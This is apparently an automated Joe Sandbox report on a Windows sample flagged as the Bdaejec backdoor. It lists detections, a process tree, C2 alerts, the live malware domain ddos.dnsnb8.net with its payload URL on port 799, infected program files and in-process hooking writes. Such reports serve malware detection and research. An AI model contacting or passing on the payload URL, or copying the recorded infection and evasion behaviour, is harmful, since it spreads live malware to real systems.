Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
Analysis ID:1509229
MD5:6824b9059b9c6f285f3c6caf2ee19ecc
SHA1:81e01ba0fe5279ad470cecbb287cb20aec28a13b
SHA256:89926d7f0153f7258e706acad4ddfe3106bf4ee11fa711170b2133971022b56f
Tags:exe
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Detected VMProtect packer
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe (PID: 2196 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe" MD5: 6824B9059B9C6F285F3C6CAF2EE19ECC)
    • mXfByV.exe (PID: 5008 cmdline: C:\Users\user\AppData\Local\Temp\mXfByV.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: mXfByV.exe PID: 5008JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-11T10:32:00.466633+020028079081Malware Command and Control Activity Detected192.168.2.64971044.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-11T10:31:59.975702+020028385221Malware Command and Control Activity Detected192.168.2.6648891.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeAvira: detected
    Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarn2Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarDAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar2pAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:Avira URL Cloud: Label: phishing
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: ddos.dnsnb8.netVirustotal: Detection: 11%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarDVirustotal: Detection: 8%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar2pVirustotal: Detection: 11%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:Virustotal: Detection: 9%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeReversingLabs: Detection: 100%
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeVirustotal: Detection: 95%Perma Link
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeReversingLabs: Detection: 55%
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeVirustotal: Detection: 50%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeJoe Sandbox ML: detected
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_006429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_006429E2
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00642B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00642B8C
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.6:64889 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.6:49710 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 799
    Source: global trafficTCP traffic: 192.168.2.6:49710 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00641099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,2_2_00641099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: mXfByV.exe, 00000002.00000003.2139694761.0000000001250000.00000004.00001000.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
    Source: mXfByV.exe, 00000002.00000002.2214008040.00000000013AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: mXfByV.exe, 00000002.00000002.2214279858.0000000002DEA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar2p
    Source: mXfByV.exe, 00000002.00000003.2152475783.00000000013B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarD
    Source: mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
    Source: mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn2
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeString found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeString found in binary or memory: http://pki-ocsp.symauth.com0
    Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: mXfByV.exe, 00000002.00000003.2152475783.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000002.2214008040.00000000013AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comrobat
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_bb1dc225-0

    System Summary

    barindex
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: .vmp0 and .vmp1 section names
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: section name: +!i~u
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: mXfByV.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_006460762_2_00646076
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00646D002_2_00646D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\mXfByV.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532
    Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: mXfByV.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: mXfByV.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: mXfByV.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/11@1/1
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_0064119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_0064119F
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5008
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeFile created: C:\Users\user\AppData\Local\Temp\mXfByV.exeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeReversingLabs: Detection: 55%
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeVirustotal: Detection: 50%
    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeProcess created: C:\Users\user\AppData\Local\Temp\mXfByV.exe C:\Users\user\AppData\Local\Temp\mXfByV.exe
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeProcess created: C:\Users\user\AppData\Local\Temp\mXfByV.exe C:\Users\user\AppData\Local\Temp\mXfByV.exeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: ddraw.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: dsound.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: dciman32.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic file information: File size 3678720 > 1048576
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: Raw size of .vmp2 is bigger than: 0x100000 < 0x380a00
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeUnpacked PE file: 2.2.mXfByV.exe.640000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp2
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: section name: .vmp0
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: section name: +!i~u
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: section name: .vmp1
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeStatic PE information: section name: .vmp2
    Source: mXfByV.exe.0.drStatic PE information: section name: .aspack
    Source: mXfByV.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.2.drStatic PE information: section name: PELIB
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.2.drStatic PE information: section name: u
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00641638 push dword ptr [00643084h]; ret 2_2_0064170E
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_0064600A push ebp; ret 2_2_0064600D
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00646014 push 006414E1h; ret 2_2_00646425
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00642D9B push ecx; ret 2_2_00642DAB
    Source: mXfByV.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.9337247832427265
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.9335218015971005
    Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.934646157098818

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeFile created: C:\Users\user\AppData\Local\Temp\mXfByV.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 29B0005 value: E9 2B BA 99 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 7734BA30 value: E9 DA 45 66 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 29C0008 value: E9 8B 8E 9D 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77398E90 value: E9 80 71 62 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2AE0005 value: E9 8B 4D E5 73 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 76934D90 value: E9 7A B2 1A 8C Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B00005 value: E9 EB EB E4 73 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 7694EBF0 value: E9 1A 14 1B 8C Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B10005 value: E9 8B 8A E1 72 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 75928A90 value: E9 7A 75 1E 8D Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B20005 value: E9 2B 02 E3 72 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 75950230 value: E9 DA FD 1C 8D Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B40005 value: E9 5B 2E 84 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382E60 value: E9 AA D1 7B 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B50005 value: E9 DB 2F 83 74 Jump to behavior
